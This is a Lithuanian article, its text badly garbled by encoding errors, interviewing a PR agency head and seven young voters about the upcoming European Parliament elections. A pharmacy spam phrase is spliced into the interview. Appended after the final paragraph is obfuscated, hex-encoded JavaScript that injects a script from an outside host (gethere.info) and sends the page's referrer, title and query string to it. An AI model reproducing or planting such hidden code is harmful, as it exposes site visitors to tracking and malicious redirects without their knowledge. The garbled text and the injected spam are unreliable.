Jaunimo nuomonA� apie bA�simus Europos Parlamento rinkimus

Iki Europos parlamento rinkimA? likus vos kelioms dienoms, internete pasirodo vis daugiau A?vairiA? A?moniA? nuomoniA? apie kandidatus pretenduojanA?ius A? A?iA� vietA�. NuomoniA? daug, smagu, jog balsuojanA?iA?jA? taip pat daug. PilieA?iams reporteriams pavyko pakalbinti vienA� vyrA�, aktyvai dalyvaujantA? diskusijose ir nebijantA? reikA?ti nuomonA� apie politikA� a�� KarolA? A?ukauskA�.A�PapraA?ytas duoti interviu K. A?ukauskas noriai sutiko.

– Papasakoti plaA?iau apie save a�� kas esate, kA� veikiate gyvenime, kuo domitA�s.

– Esu baigA�s politikos studijas Vilniaus universitete (VU TSPMI), taA?iau studijA? metais susidomA�jau vieA?aisiais ryA?iais, todA�l politika liko tik hobis, o vieA?ieji ryA?iai a�� profesine veikla.

A�iuo metu vadovauju komunikacijos agentA�rai a�zManiaca�?, dirbame su krA�va skirtingA? A?moniA?, todA�l man A?i sritis patinka a�� dinamiA?ka, didelA� A?vairovA�, kurios ne visuose darbuose gali sutikti. Aktyviai domiuosi politika, nors pats joje ir nedalyvauju. Tiesa, studentavimo laikais esu buvA�s Lietuvos jaunA?jA? Europos federalistA? organizacijos prezidentu a�� A?i organizacija dar iki Lietuvos A?stojimo A? ES skatino jaunimA� domA�tis ES suteikiamomis galimybA�mis ir pan. BA�tent su ja Norvegijoje (paradoksas a�� A?alyje, kuri nepriklauso ES) pasitikau Lietuvos A?stojimA� A? ES.

HobiA? turiu daug, didA?iausias be konkurencijos bA�tA? kelionA�s, greta dar ir kiti, kaip strateginiai stalo A?aidimai, fotografija, istorija (ypaA? Antrasis pasaulinis karas). Tiesa, dabar prie hobiA? galima priskirti ir sA�naus auginimA�.

order sertraline online. – GirdA�jome, jog turite savo asmeninA? bloga�?A� a�� kokiA� jo atsiradimo istorija, apie kA� stengiatA�s raA?yti ir ar jA�sA? A?raA?uose daA?nai minima politika/Europos SA�junga/Europos parlemtas?

A�is blogas maA?ai kA� bendro turi su politika a�� tai yra kelioniA? blogas su vienu kitu A?raA?u, kuris nelabai susijA�s su kelionA�mis. 2009 m., ekonominei krizei siautA�jant, su tuo metu dar bA�sima A?mona nusprendA�me mesti darbus ir iA?vykti 100 dienA? pakeliauti po PietryA?iA? AzijA�. Draugams ir artmiesiems sukA�rA�me blogA� a�� www.100dienu.lt, kur beveik kasdien dalinomA�s A?spA�dA?iais ir nuotraukomis iA? Azijos. Po kelionA�s jo nenumarinome, tA�siame kelioniA? apraA?ymus iA? A?vairiA? A?aliA?, kadangi kasmet keliaujame bent 5-6 kartus. Ir vis tiek ne visos kelionA�s ten dar apraA?ytos, vis trA�ksta laiko prisA�sti iA?samesniems apraA?ymams.

O apie politikA�, Europos SA�jungA� ar EP rinkimus daA?niau reiA?kiu savo nuomonA� Facebooke a�� ideali erdvA� diskusijoms, todA�l tai darau daA?nai ir aktyviai.

– Jau A?A? savaitgalA? vyks Europos Parlamento rinkimai a�� kokia JA�sA? nuomonA� apie kandidatus?

– Europos parlamento rinkimus A?iek tiek uA?goA?A� LR Prezidento rinkimai, bet iA? kitos pusA�s, tai tik padidins rinkimA? aktyvumA�. Mano nuomone, Europos parlamentas lietuviams yra dar per maA?ai paA?A?stama, daA?nai mistifikuojama ar nuvertinama institucija, ir tai pirmiausiai dA�l to, jog buvA� ir esami EP nariai iA? Lietuvos nededa dideliA? pastangA? paaiA?kinti A?ios institucijos prasmA�s Lietuvos rinkA�jams. TodA�l ir aktyvumas A? EP rinkimus bA�na maA?as.

KandidatA? yra A?vairiA? a�� nuo A?alio jaunimo iki patyrusiA? politikos vilkA?. Renkantis svarbiausia atsijoti, kurie iA? jA? dirbti EP nori dA�l politinA�s ramybA�s ir didelA�s algos, o kurie iA? tikrA?jA? mato galimybiA? prisidA�ti prie ES ateities kA�rimo. Mane labai stebina Seimo nariai ir ypaA? ministrai, dalyvaujantys EP rinkimuose a�� tokiu dalyvavimu jie spjauna A? rinkA�jus, kurie juos iA?rinko Lietuvoje. YpaA? ministrai, kurie sutinka bA�gti nuo prisiimtos atsakomybA�s viduryje darbo.

Kas dA?iugina a�� EP dalyvauja nemaA?ai jaunA? kandidatA?, partijos po truputA? juos A?sileidA?ia A? aukA?tesnes pozicijas.

– Ar A?adate balsuoti Europos Parlamentos rinkimuose a�� kodA�l A?adate/neA?adate?

– Balsuoju visuose rinkimuose visada, nes tai ir mano teisA�, ir pareiga. Nebalsuodamas aA? leidA?iu uA? mane iA?rinkti kitiems a�� aA?iA�, ne, jau turime ir taip keistA? politikA? Lietuvoje, kuriuos iA?renka keisti rinkA�jai. TodA�l visuose rinkimuose, tarp jA? ir EP, dalyvauti reikia.

– Kaip bA�tA? galima paskatinti jaunA� A?mogA? balsuoti?

– Darbas ilgas ir sudA�tingas, bet tai turA�tA? prasidA�ti nuo mokyklos, edukuojant moksleivius apie jA? teises ir pareigas, A?traukiant ir politikos praktikA� a�� susitikimai su jaunais politikais ir pan. Pastaruoju metu internetinA�s erdvA�s dA�ka jaunimas, bent jau miestuose, pradeda balsuoti aktyviau, bet vis tiek beveik dvigubai atsilieka nuo pagyvenusiA? A?moniA? a�� tikiuosi, A?is skirtumas ateityje tik maA?A�s.

Sulaukus tokiA? atsakymA?, iA?kilo klausimas a�� ar jaunimas iA? ties vangiai reaguoja A? Europos Parlamento rinkimus ir ar A?ada balsuoti A?iais metai. Buvo apklausti ir 7 atsitiktiniai jauni A?monA�s, kurie visi kategoriA?kai atsakA�, jog dalyvauti rinkimuose tikrai A?ada.

Vidmantas Valantiejus, 29 m.

Balsuoti tikrai A?adu. Tai yra mano pilietinA� pareiga. Mano manymu, balsuoti yra labai svarbu. Juk mes renkame A?mones, kurie atstovaus mA�sA? A?alA?. Reikia balsuoti, kad ten patektA? kuo daugiau gerA? A?moniA?.

vidman

A?ygimantas Civilka, 18 m.

Taip, A?adu balsuoti. Mano nuomone, kiekvienas pilietis privalo atlikti savo pareigA� – eiti balsuoti, todA�l ketinu eiti balsuoti, noriu iA?reikA?ti savo politinA� valiA�. Mes esam ES dalis, dA�l to turime iA?rinkti atstovus, kurie tinkamai atstovautA? mums – Lietuvos pilieA?iams.

yg

Sigita ValantiejA�tA�, 19 m.

Taip, A?adu balsuoti Europos Parlamento rinkimuose, nes, mano nuomone, Europos sA�jungai privalu turA�ti stiprA? ParlamentA�, kuris galA�tA? efektingai ir kokybiA?kai atlikti savo darbA�. TodA�l svarbu iA?rinkti tam tinkamA� komandA�.

sig

Lukas Pilipaitis, 18 m.

Taip, balsuosiu. Pirmiausia balsuoti todA�l, nes esu pilietiA?kas. Man rA�pi Europos bei Lietuvos likimas. Taip pat rA�pi ateinanA?iA? kartA? likimas. Nuo mA�sA? priklauso kokiA� LietuvA� paliksim savo vaikams.

luk

Andrius Fioklinas, 20 m.

A?adu balsuoti, nes man rA�piA� Lietuvos ateitis. Niekas kitas nepakeis Lietuvos gerovA�s, jei tik ne mes patys.

andrius

AustA�ja SirijataviA?iA�tA�, 18 m.

Taip, kadangi tai pirmi metai kai galiu iA?sakyti savo nuomonA� ir iA?rinkti tuos kandidatus, kuriais aA? tikiu.

aust

Titas Linevas, 23 m.

Taip, tikrai eisiu balsuoti ir jau seniai A?inau uA? kA� balsuosiu, esu tvirtai apsisprendA�s. Manau kiekvienas turA�tu bA�ti apsisprendA�s uA? kA� balsuos, o ne dar svarstyti ar eiti balsuoti. Kuo daugiau pilieA?iu eis balsuoti, manau tuo bus geriau, bus sveika konkurencija, kad veliau kaip ir daA?niausiai bA�na, tik girdime nuogA�stavimus ir murmA�jimus, kad viskas blogai, kad niekas nieko nedaro, manau visu pirmA� reikia savA�s paklausti, o ar tu pats kaA?kA� padarei, kad kiti turA�tu daryti ? Lengviausia teisti. Tad visus raginu eiti iA?reikA?ti savo nuomonA�s, nes nuo kiekvieno pilieA?io priklauso mA�sA? tolimesnA� Lietuva. Tikiuosi ateityje girdA�ti tik graA?ius A?odA?ius ir pagyrimus, o ar taip bus, priklauso tik nuo TavA�s.

tit

Taigi, su nekantrumu laukiama Europos Parlamento rinkimA? ir tikimA�s, jog jauni A?monA�s A?sitrauks A? A?iA� veiklA�, bei atiduos savo balsA� tiems kandidatams, kurie padA�s Lietuvai tobulA�ti.var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}